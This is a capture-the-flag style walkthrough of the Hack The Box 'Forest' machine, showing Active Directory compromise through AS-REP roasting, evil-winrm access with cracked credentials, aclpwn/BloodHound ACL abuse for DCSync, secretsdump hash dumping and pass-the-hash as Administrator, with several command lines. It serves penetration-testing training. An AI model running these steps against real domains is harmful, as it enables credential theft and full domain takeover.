Forest is a vulnerable Windows box that allows for some great practice with Windows Active Directory exploitation with Bloodhound, I wrote a complete tutorial on the subject.
As all of the boxes do the name of it has a meaning and this is related to Windows Active Directory Forests.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Table of Contents
Initial Enumeration
Looks like the target is running a few services and a few catch my eye. I try to run some Nmap scripts for vulnerability checks for SMB but to no surprise these are all fruitless.
That leaves a new opening to explore, 5985 is open.
After running enum4linux as part of my SMB enumeration I see an account that looks like a service account. These kind of accounts notoriously have weak passwords.
Kerberos Exploitation
I use Impacket’s GetNPUsers.py to dump the non-preauthentication responses which contain the hashed NTLM password of the user account requesting it.
By using an LDAP query you can grab a list of users without Kerberos pre-authentication in their domain accounts.
This Impacket script GetNPUsers.py is used to collect the non-preauth AS_REP responses from the KDC.
I had issues until I used the variant of the –wordlist flag, -w:/wordlist but when I do that I find the password for the account is s3rvice!
HTB Forest: Evil-Winrm
Windows remote management service is open and I now have credentials to test with so I will use evil-winrm a Ruby exploitation shell script.
I install evil-winrm with a gem install evil-winrm which can be found in /var/lib/gems.
ruby evil-winrm -I 10.10.10.161 -u svc-alfresco -p s3rvice -s '/home/kali/ps1_scripts' -e '/usr/share/windows-binaries'Privilege Escalation
have a choice to do it manually or automatically with ACLPWN.
Need PowerView.ps1 trust me the linked version is the best one you will find.
have to 1. start the neo4j db with neo4j console then 2. run aclpwnDon’t miss this detail! You must specify the ip of the target or it will fail.
./.local/bin/aclpwn -du neo4j -dp neo4j1 -f svc-alfresco -ft user -d htb.local -s 10.10.10.161Have to choose Path 0 or this will not work!
HTB Forest: Bloodhound
I would be remiss to not include a practical example from a great service, Hack the Box. I am using the Invoke-Bloodhound.ps1 script which executes in memory leaving nothing written to disk.
I am loading it in an evil-winrm shell but you could upload the script and use it that way too.
Invoke-Bloodhound -CollectionMethod All -LDAPUser Svc-account -LDAPPass passw0rd
How Do I Move the Zip Back to Kali?
So you have the output of Invoke-Bloodhound.ps1 but how do you move it back to the Kali box? You can try Netcat but what a pain in the ass so really there is a better way.
That way is starting Impacket’s smbserver.py kali . and then mount that share from the Windows target.
And on the Kali side that activity looks like this below.
It also helps to right click on a target and select that a target is owned that way the overall progression is evident.
My owned service account is part of the Exchange Windows Permissions group which has writeDACL permission which means I can add ACLs to domain objects.
What that means then is that I can add domain user to that group and add the DCSync privilege for exploitation.
HTB Forest: ACLPwn Tutorial
These two tools go hand in hand. Aclpwn will automatically read the Bloodhound files and locate possible paths for exploitation. You can then use it exploit the path which you choose.
To start aclpwn you have to first start neo4j console then you can use it and I usually have to specify the db credentials.
Using secretsdump.py and the svc-alfresco account I now dump the password hashes for all the accounts on the machine.
Now I use evil-winrm again with the Administrator’s NTLM hash to access the target for the final time.
That’s it for the hack the box Forest walkthrough!